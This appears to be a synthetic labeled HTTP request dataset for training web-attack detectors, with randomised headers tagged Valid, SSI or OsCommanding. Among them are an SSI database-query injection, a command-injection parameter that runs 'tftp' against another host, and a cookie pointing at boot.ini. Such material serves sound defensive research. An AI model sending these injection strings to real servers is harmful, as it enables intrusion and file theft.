GET /nE/divQrmN8tmpj9Z.jsp?3pbastlohazols=7-XrOB&ahQlnarjo=ssg2&oo0eEioc8isra47=-homea&Oshiz2t=ntNh&InoptDzANs=YsoOeROwgetxpnetcat-&wsanOrt5to9e=1989035665&meof=mZI3pkx&uCknsa0ir=+ssrv&G3Yq_q8havingRadminje=n5sblsPassdeleteeaeIdo%3D&ah=0pat_bm&f3edet=tnrpi6Rcob HTTP/1.0
Host: www.smra.st:80
Connection: keep-alive
Accept: text/xml;q=0.0, image/jpeg, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 166.252.214.129
Cookie: xMi3co4DusN= xnull;Kox8TexecU7BIFn=34324816;esvfz3iusfR=exwfe;td8ume8aosm=yasid;4m5hfndiodmcey=s Ttisa$%az%;se2ou3twhmtwrtT=t:\winnt\boot.ini
Date: Sat, 17 Sep 05 13:20:38 CET
ETag: W/"BlLc.gxDQXGOVLncLrLM"
Expect: 100-continue
From: ttod@msoo.gov
If-Modified-Since: Sun, 14 May 06 05:24:04 CET
If-Unmodified-Since: Wed, 22 Mar 06 04:29:43 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 11 Aug 04 01:55:46 GMT
Max-Forwards: 0
MIME-Version: 7.4
Pragma: 9o8nenE6=tevnn
Proxy-Authorization: Basic Z3dFcmVicWo6aXRHM2FuZGM=
Authorization: NTLM dTFlMmlzN3FhTm1ndHYwdGlpYmVjTjkybzlZbWlzejhpbTV1VnM=
Referer: http://www.yahtm.com/E3powdde/ytlrh/i2ekhOjt.jsp
TE: gzip;q=0.8
Trailer: User-Agent
User-Agent: akeJlj6zrf http://www.iwewopbw.ch
UA-CPU: 68000
UA-Disp: 3094,315,16
UA-Color: color32
Via: FTP/4.2 www.eosconir.shtml, 1.1 www.ndig4run.gif
Transfer-Encoding: identity
Upgrade: gfseoS/3.3, awe/2.6
Warning: 016 www.4ru5.js "o8ttii4udn" "Sun, 07 Aug 05 05:14:03 CET"
X-Forwarded-For: 89.188.34.230

null

End - Id: 45339
Start - Id: 22937
class: Valid
GET /irplenAa2esvhnn.msf? HTTP/1.1
Host: www.krttm.be
Connection: close
Accept: text/xml
Accept-Charset: x-mac-japanese;q=0.9, iso-8859-5, x-mac-icelandic;q=0.4
Accept-Encoding: deflate, identity, compress, identity;q=0.0
Accept-Language: agheler-kis, oeeqEn-te9eaezr, R9rlens2-no, tmd9oia-ncsse, 3el2e-ihnb
Cache-Control: max-age=91
Client-ip: 53.69.199.207
Cookie: CnEtestexroehp=2992;izG-libHai=~ne)-;notnmjTht=/7@?la=/bniowhereD Nt;JNC3=350
Cookie2: $Version="8"
Date: Sun, 27 Aug 06 15:35:09 UTC
ETag: W/"7wTF12Qg9gzKIlgkm9"
Expect: c9U4=dtl8rty
From: xsep@sla5a0.de
If-Modified-Since: Tue, 16 Mar 04 17:34:48 GMT
If-Unmodified-Since: Wed, 18 Feb 09 10:32:39 GMT
If-Match: *
If-None-Match: "a1ACJ-Fezj9aemYKV"
If-Range: Sun, 26 Jul 09 14:08:41 GMT
Max-Forwards: 89
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: ieSnx2 uercttms=caa5oarX
Authorization: sh5fa tirnAf=mhRn3M
Range: 3828-,508-92
Referer: http://www.zanldp.uk/7lenTr/9I1tmoo.bin
TE: trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/6.9 (Windows; U; Win 9x 2.2; fn-dl; rv:4.7.7) Gecko/97067279
UA-CPU: 68000
UA-Disp: 813,4500,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: FTP/2.2 87.248.109.112, 9.5 www.awPasr40.htm, 0.4 www.awvtahy.htm:25504
Transfer-Encoding: identity
Upgrade: bri/8.0
Warning: 116 www.qob7.png "kgn8bPjeeFe" 
X-Forwarded-For: 18.154.169.169
X-Serial-Number: 08954851223
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22937
Start - Id: 40905
class: SSI
GET /nhaetnlgIehjjmt/aBbH4sLoIw726/lnxeqeovtiriadcs/oodeWtreNlmoorll/tr4oahctyeat.js?l9viAcet=%3C%21--+++%23odbc++++statement%3D++%22select++fgdESna8%2C+rsnaE%2C+egSEi+++++from+coefta+++++order++++by+3%2C+++43%2C+++++0%22+++++--%3E&h0oi=e7hnoewesn2&frdexai2=37963709&nhwelne=9&duE=0480 HTTP/1.1
Host: www.eecaht.uk
Connection: keep-alive
Accept: image/png;q=0.0, application/postscript, text/html;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: em3ee-rms0ktsm;q=0.8
Client-ip: 176.215.222.66
Date: Thu, 01 Feb 07 14:06:43 UTC
From: 7tnz7e@rrkue5aod.it
If-Unmodified-Since: Sun, 19 Oct 08 24:36:35 UTC
If-Match: "JM2M0.uwWBNmEmxoT-2"
If-None-Match: *
Max-Forwards: 479
MIME-Version: 1.2
Pragma: no-cache
Authorization: Basic eGl1ZTJXaXQ6b2VzZTY=
Referer: http://otaen.ch/wemq/cweampuz/wvo6m/ottcrter.txt
TE: deflate;q=0.9
User-Agent: Mozilla/4.8 (compatible; Konqueror/9.3; Open BSD i386; heeyi; omsoeIzis; choE)
UA-CPU: MIPS
UA-OS: FreeBSD
Via: unjiF/7.5 www.porew.html, HTTP/2.0 243.127.206.93
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Serial-Number: 163741114628927

null

End - Id: 40905
Start - Id: 7203
class: Valid
POST /nloaSqs_m2hc/vctiqeaO.swf? HTTP/1.1
Content-Length: 61
Content-Language: Ew
Content-Encoding: compress
Content-Location: http://www.hesg.cz/inurb/Psze/hwpi.php4
Content-MD5: eEFxb3JmZW95eWNEZ2R0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Dec 06 12:07:46 UTC
Last-Modified: Sun, 04 Nov 07 05:41:17 UTC
Host: 143.24.234.65
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, gzip;q=0.3, deflate;q=0.2, gzip;q=0.4
Accept-Language: heH-emoo;q=0.8, aRle-3;q=0.6, 28sjwjmi-tyCdat, Toisam-aNr;q=0.8
Cache-Control: max-age=1
Client-ip: 255.188.160.16
Cookie: bdeas4hbtaod=e ma9 <;msta=dezkes;yhJh4=tuzzeiu;oeo5l5n=7519
Cookie2: $Version="7"
Date: Sun, 24 Jun 07 07:27:12 CET
ETag: W/"rn6sybHKNVxYy6EGGhl"
Expect: trnhhu
From: eklcds@EusetgdssJ.biz
If-Modified-Since: Sat, 02 Feb 08 02:48:37 CET
If-Unmodified-Since: Wed, 01 Mar 06 12:08:15 CET
If-Match: "RpSJAwxNNqnHp0Ss5"
If-None-Match: "0oRJZOwg46uSF4_tGm"
If-Range: "Z5EJA0O@HDvaEhX"
Max-Forwards: 91
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest nc=9f15Ac7e
Authorization: tdstnc daeosst0=eshteist
Range: 835-,-3,7-0
Referer: http://fieNnf.be/cmers/a0oyn/0amlaa/roirmAL/d1H6e.cgi
TE: trailers
Trailer: TE
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 5.8; e6-zm; rv:9.1.0) Gecko/82269566
UA-CPU: Sparc
UA-Disp: 5578,6674,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 629x010
Via: HTTP/9.8 www.lisxu80.shtml, uewc8/0.2 160.37.144.101, 2.7 www.finsaip.jpg
Transfer-Encoding: gzip
Upgrade: nctee/4.4, seyc/3.3, leTnv/8.7
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 62.39.133.239
X-Serial-Number: 741957676224840602
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

onduichdHoaase=si&szbE=hrm0deAi3enii&1ecynbdojmf4e0=ampwnAIK2

End - Id: 7203
Start - Id: 22230
class: Valid
GET /f2/zbAmdKnrUp_/4K@W@CeZR.asmx?eecvseklMyoabn=04800012&5tteohesic=igvE_&o8Exeer=7369&rif1=4698 HTTP/1.1
Host: www.nIthoA.gov:80
Connection: close
Accept: video/*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, gzip;q=0.5, compress, deflate;q=0.6
Accept-Language: p-oh, hkAa-umz, ss-woSoc, no-eoEtio, esReche-ywyyjd
Cache-Control: max-stale=901
Client-ip: 195.59.193.40
Cookie: awag=haebgktt;ews6ie=26;066B.dPqT=ix];Tihtrrg=52020638;gwKvtuhtetbxne=90542692
Cookie2: $Version="14"
Date: Thu, 28 Jul 05 22:42:33 CET
ETag: "P013iay-N1dwHPpVuB"
Expect: 100-continue
From: orEtts@ismhaeter.de
If-Modified-Since: Tue, 03 Aug 04 17:36:31 GMT
If-Unmodified-Since: Sun, 02 Sep 07 03:43:21 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Mar 05 04:44:10 UTC
Max-Forwards: 650
MIME-Version: 4.2
Pragma: aks='2Shlras'
Proxy-Authorization: Basic dXJsNnJyczpzZWJzM2Rj
Authorization: NTLM aEhkUmVlbG5pajhzbW0wYXNlNWhEa2Vpb2VlZXM0Y0thaXQ=
Range: -09
Referer: /f5Eh5mb/icD4z/lneoi.pl
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: itrrotojm (eIP9_m6Uq5; oYyIgF.pkM; nsIqE0H1sl; ouyJq-0bb; zaWlli@h)
UA-CPU: Sparc
UA-Disp: 4787,167,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1581x2081
Via: HTTP/6.3 18.210.136.114, 3ggGvi/4.8 54.92.80.103:2319
Transfer-Encoding: gzip
Upgrade: llxrnU/8.5, 9sez/6.3, 5o9gtz/1.6, sio/7.4, ahOwn/2.8
Warning: 706 www.iiOa5uY.htm "dlo7est8pohpffoz" 
X-Forwarded-For: 94.18.15.215
X-Serial-Number: 499244
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22230
Start - Id: 15332
class: Valid
GET /8Hk90uK/28bIRb/lniaaeahn/lz2uuHH8D1M/iijzWDh3xYASTe_sMS/luTgE/nCl-R660pvSI/E0rcpeR/reiiEduotnlsohur/iwDD.U9iWBD4nja3_/tGs0J5CR3ynWY33WCT.mdb? HTTP/1.1
Host: 105.17.220.27
Connection: a89h5bs
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, identity;q=0.3, gzip;q=0.8, identity
Accept-Language: ep-e, x-asEtiqc;q=0.3, 8dOt-u;q=0.7, d-o, modn-xsder
Cache-Control: no-transform
Client-ip: 203.250.71.183
Cookie: audrehedm=azgLOI6;iNh9waTw=$5oncmdaa6iui>sf
Cookie2: $Version="3"
Date: Mon, 26 Sep 05 21:25:39 GMT
ETag: W/"0Wdnb5ANSCwc@BGCRW.t"
Expect: 100-continue
From: 0dpjRd@6hfr.uk
If-Modified-Since: Fri, 01 Oct 04 10:25:48 GMT
If-Unmodified-Since: Sat, 25 Feb 06 08:29:45 UTC
If-Match: "EzU3@@6BGmmmsmtsgLvf"
If-None-Match: "MTivAndjJWcZ1XQiW4G"
If-Range: Mon, 07 Jan 08 09:08:33 UTC
Max-Forwards: 1143
MIME-Version: 3.9
Pragma: lal3bIeN='wL'
Proxy-Authorization: NTLM ZXNuZXNpZ2hvRWFpbGVpZ3RlMXJvbnNhaWUxaVJ0aGlyc2Rl
Authorization: Basic bHR0YTpvN3Zo
Range: 879-,-59988
Referer: /enlaesit.exe
TE: chunked,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.1 (X11; U; SunOS sun4u 6.4; ti-rh; rv:1.3.3) Gecko/52750002
UA-CPU: 68000
UA-Disp: 4257,289,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5504x488
Via: 6.1 179.213.1.177
Transfer-Encoding: compress
Upgrade: 3hc2/0.6, 3ner/5.3, i8e6ti/2.6, hoN/8.2, aise/6.4
Warning: 486 147.132.247.92 "m5pjeocbh" 
X-Forwarded-For: 139.65.0.173
X-Serial-Number: 7835814731
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15332
Start - Id: 44611
class: OsCommanding
GET /9u8/nxMQ/3Pk1Drldl1T_MJQS/oN.gif?bZ2ZiCj=109.38.210.230++%3B+++tftp+192.168.10.33+test.txt&vIHo=h HTTP/1.1
Host: www.totvldalm.cz
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, deflate;q=0.1, gzip;q=0.9
Accept-Language: ti37q-hraltWfd, rnttGn-yihh;q=0.0, e8tu-7gaslnG
Cache-Control: max-stale
Client-ip: 69.114.91.22
Cookie: ol3Nivro=3800090;p1eohe1Ihov=?@eoi;5wt=ws eoer>]ertmpnhaisi-p
Cookie2: $Version="4"
Date: Tue, 04 May 04 13:32:12 GMT
ETag: W/"s5g6qnsYgtokpr41lg"
Expect: sics3mi=5hos2;rStOaann
From: yrtaag@x3hp5xn5i.net
If-Modified-Since: Sun, 17 Jun 07 11:25:25 GMT
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: "JUf9cCc.LZTIJK58Vc"
If-None-Match: "_sJQ4O0wg_5rudB3"
If-Range: Sun, 09 Apr 06 08:33:41 CET
Max-Forwards: 7
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Ntiork yesrssnr=smegluuc
Range: 41676-
Referer: /Stoostd/Ionrreq.doc
TE: trailers,trailers
Trailer: Host
User-Agent: pK-uBQ972 http://www.eeplntfZ.org
UA-Disp: 0488,6492,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/5.3 188.64.121.58
Transfer-Encoding: gzip
Upgrade: oTe/6.3, en2/3.5, hq1ltn/9.0, 9elp1/2.1, Esotly/2.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 84.212.52.145
X-Serial-Number: 92326230406152
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44611
Start - Id: 17299
class: Valid
GET /th2eiikmnNfalee/daauo7ghhqc2dy5d/eyMr/IfromOcmdconnectbbD2jk/QthYq/orsatqiuw4emd/hlsaur-HJN@b-L.htm?nei=fGijx&toaZrzRea=metaepmjrdln9eAi9%2Breplaceallq&9BcsnObssfhtne=40393763 HTTP/1.1
Host: www.innihf3nhn.it
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-6, shift_jis, windows-1254;q=0.1, windows-1252, isiri-3342;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 8.71.56.250
Cookie: i6TtcE=189886
Cookie2: $Version="526"
Date: Wed, 28 Jun 06 10:23:09 CET
ETag: W/"tUtIzZLIRTEv2QLQH"
Expect: 100-continue
From: ahipt@bhraulhaa.fr
If-Modified-Since: Sun, 11 Jan 09 17:56:52 CET
If-Unmodified-Since: Sun, 04 Mar 07 09:35:39 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 25 Mar 05 04:31:06 GMT
Max-Forwards: 421
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: eirux knieeo=9h8tlf
Range: -03,4-133137
Referer: /2fzsa61p/bU7j/arhiup/leHato.msf
TE: gzip
Trailer: Pragma
User-Agent: Mozilla/0.0 (Windows; U; Win 9x 7.3; ls-4n; rv:6.0.8) Gecko/74285777
UA-CPU: StrongARM
UA-Disp: 7151,7445,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0027x5589
Via: 0.9 www.etmiala6.gif
Transfer-Encoding: snrj
Upgrade: gnoa/0.3, nree/3.4, 2t3kns/8.8, Fnehon/4.7, kr7scp/0.5
Warning: 526 102.181.177.151 "iqxaehtm" "Wed, 11 Jun 08 17:56:22 GMT"
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 835471798337
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17299
Start - Id: 18175
class: Valid
GET /thadDcCetttpi/tKKQ-Gg/sX/qlD2./sRlwgkqAC/3Fndu_FB4r_gov/e4sY61EH449hcFi58k/CxmLJDU6SL4tj.html?ite=drifGe&CODF=kclwei6libujhh&t0cedn3ea=Teta&tonfru=t2uzL.UHNeh&ienihe9xhiO=wz6&oit5Nfc=152856774&hxcrsm=tt1saiCO&10jP=eGuTyvG&KlUQin=+%5Be&1o1yw=%3D5h1&e6oocp=mocha%7Ctu&mshiaotneoddthe=l%2FeoeuiaC7Tm7&pafaebrtivod=00 HTTP/1.1
Host: 100.106.238.232
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7;q=0.9, x-mac-ce, iso-8859-6
Accept-Encoding: *;q=0.0
Accept-Language: h5nveo-gt
Cache-Control: max-age=13197
Client-ip: 235.3.254.254
Cookie: aONMQ=e0aga(;ne=sxaecmIpcsiaitcb;feoCa=  3v jrtuh;
Cookie2: $Version="112"
Date: Wed, 29 Jul 09 21:40:57 GMT
ETag: W/"EwNu1@ChyBMDCdLM"
Expect: 100-continue
From: bsls@bhsx2cetl.be
If-Modified-Since: Mon, 16 Apr 07 07:59:30 UTC
If-Unmodified-Since: Wed, 14 May 08 08:40:51 UTC
If-Match: "g.hOfGIIWeYu4rknWb"
If-None-Match: "UJ@6r_v-sNhY1EV"
If-Range: Mon, 22 Dec 08 17:53:50 GMT
Max-Forwards: 2982
MIME-Version: 7.1
Pragma: 5reeo=ble
Proxy-Authorization: Digest algorithm=MD5
Authorization: naLg Afdecvbr=tiaol0d
Range: -639
Referer: http://xIo2u.de/fedeei.rar
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.6 (compatible; MSIE 1.1; Win98; 3evcisb; qslixaRo; iaehdid)
UA-CPU: MIPS
UA-Disp: 904,033,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3922x0648
Via: 5.1 www.oHmeed.html, 8.3 www.idlne.gif:16939
Transfer-Encoding: compress
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 282 www.mtd6lng.tiff "rqniee0sohncxoe" 
X-Forwarded-For: 53.225.75.3
X-Serial-Number: 45102302554958015
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 18175
Start - Id: 20007
class: Valid
GET /olu/ewssceyacltonpaeai1s/rjlsemsnzgmgbsattAo/jtot9dnlMpg4/lb3Mi5Gef8hcY97n/o7ue8etseddwod59/hfpzSxXq/0trwonlg/y@xmlbinP/0SULOQ-75i6NoumXV-l/savo7sd3qzaa.nsf?tFdoY=alhyw08&ae=7902&es5oedhhA=aMce&eueHIr0kPzdra=1725&Ta6oo5lfiukt2m=xdit&G5ceadRWh=ghavingatljNSdyti9orN&dnngqeOEtextpl=smihtaccesfeella&uEmsfgoelIiEyEe=96753843&reatiy=dihfd&t0ut=sw5-&OTuuDimgpnUHox=aydFnn8exrTo2e&skuhmhissqaemT=oaI%28nph-on+ HTTP/1.1
Host: www.oisar.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: TsifD-l9id, r-fass4rhe, wajrs-S1e;q=0.3, arfn6hrw-t0ilo, i-e3hz0o2i
Cache-Control: no-cache
Client-ip: 145.7.77.203
Cookie: snb4hottt=31846403;Bu=73118;olswcahi0hc6cE=ssysock_stream&
Cookie2: $Version="8"
Date: Thu, 20 Aug 09 19:04:25 UTC
ETag: "3j4BgPdlUPkKGLV"
Expect: snesin
From: 8oou@eyrfw.gov
If-Modified-Since: Tue, 25 Dec 07 17:32:26 GMT
If-Unmodified-Since: Fri, 11 Jun 04 22:55:06 GMT
If-Match: *
If-None-Match: "W.PrD-tsx9LszkVtpQ"
If-Range: Wed, 28 Jun 06 21:13:00 CET
Max-Forwards: 8203
MIME-Version: 9.6
Pragma: nr=tiir
Proxy-Authorization: dnaoe2 udeho=Assa
Authorization: fVtifb z6sasiD=Nrae
Range: 13905-,424317-
Referer: /ntchler/eltMsao/eiltcia0/Geeeewdp.cgi
TE: trailers,chunked,deflate
Trailer: From
User-Agent: 0E5hes/5.3.7.5.9
UA-CPU: PowerPC
UA-Disp: 9579,194,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1394x7760
Via: Iot1h/0.9 171.142.58.222
Transfer-Encoding: identity
Upgrade: rsiit/3.1
Warning: 585 127.255.113.66 "riee" "Wed, 24 Sep 08 02:03:22 CET"
X-Forwarded-For: 99.9.48.167
X-Serial-Number: 185531423
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20007
Start - Id: 9042
class: Valid
GET /2eAsifsao/jnQdrop_lyp_scriptii98m/ilstRtj/includeq0afHg7xBacmd/lor0ysne9Res/bB9tMyLA0kzSCdz3j4ma/IesEsosdtnomsfa/lyjL9j044jq4T@FG.sh? HTTP/1.0
Host: 250.181.237.37
Connection: fgot
Accept: text/*, audio/x-wav;q=0.6, application/*;q=0.5
Accept-Charset: cp-936;q=0.7, cp-950;q=0.1, windows-1250, iso-8859-3
Accept-Encoding: compress;q=0.2, compress;q=0.1, compress;q=0.3, deflate
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 46.125.203.213
Cookie: thlaebshxqer=266402664;nksehce=dm02DzLX7N;fzdal=tcikeaEhoiiesE;mi=qgYoe;YZMIxp_MHXhN=80;metawwgettSz3JtconnectV1=ye/elr6a6
Cookie2: $Version="079"
Date: Wed, 09 Jul 08 01:41:11 GMT
ETag: W/"30kbexde-MHlHHe-2@3"
Expect: fstEe=rleuhia5;lee7msh=iAare
From: himir@nmrnrl.com
If-Modified-Since: Sun, 14 Aug 05 20:22:40 CET
If-Unmodified-Since: Fri, 13 Jun 08 13:24:10 CET
If-Match: *
If-None-Match: "gI_MX2lvcc_n1P013"
If-Range: Wed, 31 Dec 08 04:07:45 GMT
Max-Forwards: 8
MIME-Version: 4.3
Pragma: fapeur4e=2h
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: pIami ogsTm2i=S9ipzH
Range: -9,-8753
Referer: http://www.erd7iaY5.st/YtGec/rp6S/1war/atay/pieth.asp
TE: trailers
Trailer: TE
User-Agent: Mozilla/4.1 (compatible; ntteeeI; Linux i586; 7aouenacAr)
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 117x032
Via: FTP/2.6 www.WeGbh.shtml, shil/1.9 66.235.155.21
Transfer-Encoding: gzip
Upgrade: hrimd/4.4
Warning: 283 116.154.53.88 "5oiE4hneih" "Sat, 27 Jan 07 01:20:17 UTC"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 278976284
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9042
Start - Id: 14481
class: Valid
GET /arbemeumum0Ueau/xfzRxeo/system33_-UC5htpass/s@.9LEujWEIosqo.htm?o048tdl0Lg9w=SrvaatcIformuenoema&pW91_dXo=nWx&eef=706&eyetuslsh=aegenrcpn&ts=eeornpco&5ndggnuac=orOkLsnnrdPs&r5xne=1&mreab5tnd3=1361&dtT2Nod1=Rt+io%3F&th=atA9mThtue&hTrt=431589&mlNwpassthruHE=07137555&NhKlogx3=4578777 HTTP/1.0
Host: 39.214.113.39
Connection: keep-alive
Accept: text/plain, video/quicktime;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cayep-nibaeaE;q=0.1
Cache-Control: pasgl='Yi'
Client-ip: 185.153.120.157
Cookie: erbwfaovJb=ivhsDesdRTawiubseo;Ausn=8886;eebIuwe=6554787205;alediutim=so;jrtgbcutlotNyt=aqG
Cookie2: $Version="42"
Date: Sun, 24 Apr 05 03:28:12 CET
ETag: W/"SQ3NOYGyKTGarESea-A"
Expect: 100-continue
From: utt4e4@eaLhafx.uk
If-Modified-Since: Mon, 26 Sep 05 22:26:18 CET
If-Unmodified-Since: Mon, 20 Jul 09 14:32:29 UTC
If-Match: *
If-None-Match: "K4.UOuTCQWC.@Jn"
If-Range: *
Max-Forwards: 8
MIME-Version: 5.4
Pragma: i='mclin'
Proxy-Authorization: rt2nd ncoetwfI=ostCs1
Authorization: Digest nc=a2BCDC3B
Range: 737195-
Referer: /imomI/lTBb1/blperz.tar.gz
TE: deflate;q=0.2,gzip
Trailer: If-Unmodified-Since
User-Agent: taueet/9.5.9.6
UA-CPU: 68000
UA-Disp: 927,088,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2304x0310
Via: 9.1 247.160.52.137, 4.0 www.Gnnp.jpg:2581
Transfer-Encoding: compress
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 757 www.nIo0ah6.js "tqayt3cezel3A7N" "Thu, 01 Dec 05 06:57:15 GMT"
X-Forwarded-For: 57.244.86.38
X-Serial-Number: 309851
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14481
Start - Id: 2467
class: Valid
GET /stl62kaeX0nzr3io/bo_-GmE6esWbg-8/mMvAGmI_/iSE.F0v/legTV/muiePrsEibexjoa.shtml?dE1graoo=03775798&Ryle3aDySinn=le%3Dn&0uhMnEornOpn5=sBNsvKk&7ue=2909&etntJeoosnoeSie=9SLWb93E36cI&gEUwQeR=tdaformma0o7oyzg&havingDzphpv1stYe-N=%7C5esE&tagdnemsnu=execbddtfm%275l HTTP/1.1
Host: 96.90.199.112:217
Connection: efoR5I8l
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.7, gzip;q=0.9, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 117.244.110.184
Cookie: rtk=L]reg1ovptllh[i\s
Cookie2: $Version="0"
Date: Mon, 22 May 06 14:33:53 UTC
ETag: W/"CuRD6g@yvVRM9TXyO"
Expect: dEtda
From: 0s8tX@arsT.cz
If-Modified-Since: Thu, 06 May 10 24:55:39 CET
If-Unmodified-Since: Thu, 25 Dec 08 15:07:21 CET
If-Match: *
If-None-Match: *
If-Range: "WzVXYvcXp_5MUSt"
Max-Forwards: 7179
MIME-Version: 6.6
Pragma: C='eInUnacm'
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: NTLM d2F4dE4zUWdjZWRoTTl0ZW9sZXR0TGN3YnRpd3NvYW8xYWVvZ2w4NHNo
Range: 87817-,2898-
Referer: http://eona54j.net/c0n3U9/esiAu2/9Eco/honebo.pl
TE: gzip;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.5 (compatible; MSIE 1.0; Open BSD i586; tnwo5Twer)
UA-CPU: x86
UA-Disp: 105,9548,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 280x076
Via: 7.8 119.145.224.200:87611, FTP/1.5 158.217.237.245
Transfer-Encoding: compress
Upgrade: xtv/7.5, Ienil/2.4, AscA/8.2
Warning: 552 www.tsng.jpg:1 "tsmt879qcdlEstelgpx" "Wed, 23 Nov 05 20:06:09 UTC"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 347745233258688600
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2467
Start - Id: 7096
class: Valid
POST /dRoceotphrbg/e8tqMh-jQ5paxWiSPMw/rj/lqiibceaodvrertAhge.exe? HTTP/1.0
Content-Length: 229
Content-Language: a,eoste
Content-Encoding: identity
Content-Location: http://www.eaeq.com/hoss2Xo.png
Content-MD5: cjByUHlzeWhFcm5raW5leQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 04:48:54 UTC
Last-Modified: Thu, 20 Nov 08 13:59:12 UTC
Host: www.oci0ncI.fr
Connection: close
Accept: application/postscript, text/plain
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: httits='ja8'
Client-ip: 132.107.60.185
Cookie: yccsandersaj=k2-vURHq3;hHolsHn=175594;eahR5ecafeehm=tx;itahqWctx=5585
Cookie2: $Version="01"
Date: Wed, 21 Nov 07 06:16:50 CET
ETag: W/"QOlNzBVj@1mHJeE9wu-"
Expect: 100-continue
From: sneehouu@vual.net
If-Modified-Since: Sat, 14 Feb 04 02:34:54 CET
If-Unmodified-Since: Sun, 28 Oct 07 02:49:18 GMT
If-Match: "rh9L7wfiVSJh4Mz4cit"
If-None-Match: *
If-Range: Wed, 04 Jan 06 24:20:33 UTC
Max-Forwards: 4935
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM b3JieGR0b29uaG90b3RmZXN0ZjI5bnVvb2FvdGxvZWZlU250dGVqcg==
Range: -1123,49-40,9-39799
Referer: http://www.t6iwae.org/gulsJe/tieodheb.fgf
TE: trailers,deflate,trailers
Trailer: Accept-Language
User-Agent: ssa1ap0d (sglBI8j)
UA-CPU: x86
UA-Disp: 5151,1845,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1536x3422
Via: 9.5 228.96.10.180, 0.0 www.clte.htm:56
Transfer-Encoding: ptei3w; conb2=m4toa2
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 817 144.31.134.157 "syge" "Mon, 18 Jan 10 11:34:49 GMT"
